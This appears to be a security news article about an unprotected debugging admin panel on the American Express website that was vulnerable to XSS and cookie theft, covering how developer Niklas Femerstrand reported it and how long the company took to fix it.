A developer recently discovered that the designers of the American Express website accidentally left the website's debugging admin panel unsecured, leaving the company and its customers vulnerable to exploits and the loss of sensitive data.
SecurityWeek reports that the error has been corrected, though it is unclear for just how long the debugging panel was exposed before remediation.
“A little 'oops' that one of the developers left behind unprotected breaches many parts of American Express’ security in one hit. One might say that this mistake is a multikill," said Niklas Femerstrand, the developer who discovered the error.
The error created the opportunity for attackers to perform multiple exploits, including cross-site-scripting attacks designed to extract sensitive data like customer login credentials.
“Understandably developers get sloppy around security implementations in debug features. Ironically, this becomes a direct threat in a case where a company’s developers don’t protect their debugging tools from the public. The debugging tool is vulnerable to XSS and it quickly becomes an issue when the debugging tools are called through unprotected GET parameters,” Femerstrand said.
The error also left AmEx customers to login credential harvesting by utilizing valid AmEx URL's in targeted attacks through email notifications, according to Femerstrand.
“Through cookie stealing, an attacker that is regularly sending phishing emails could instead send legitimate URLs to the AMEX website and harvest user accounts as the victims open the link,” Femerstrand stated in an interview with SecurityWeek.
“An attacker could inject a cookie stealer combined with jQuery’s .hide() and harvest cookies which can, ironically enough, be exploited by using the admin panel provided by sloppy American Express developers," Femerstrand explained in a blog post.
Femerstrand first contacted AmEx officials about the vulnerability on October 4th, and the company took about two days to remedy the access error, not exactly the prompt response Femerstrand was hoping for after notifying the company of this major security lapse.
“When somebody voluntarily contacts a company and repeatedly mentions words like 'security vulnerability' and 'hacker' one would think the company would act as quickly as possible,” Femerstrand said.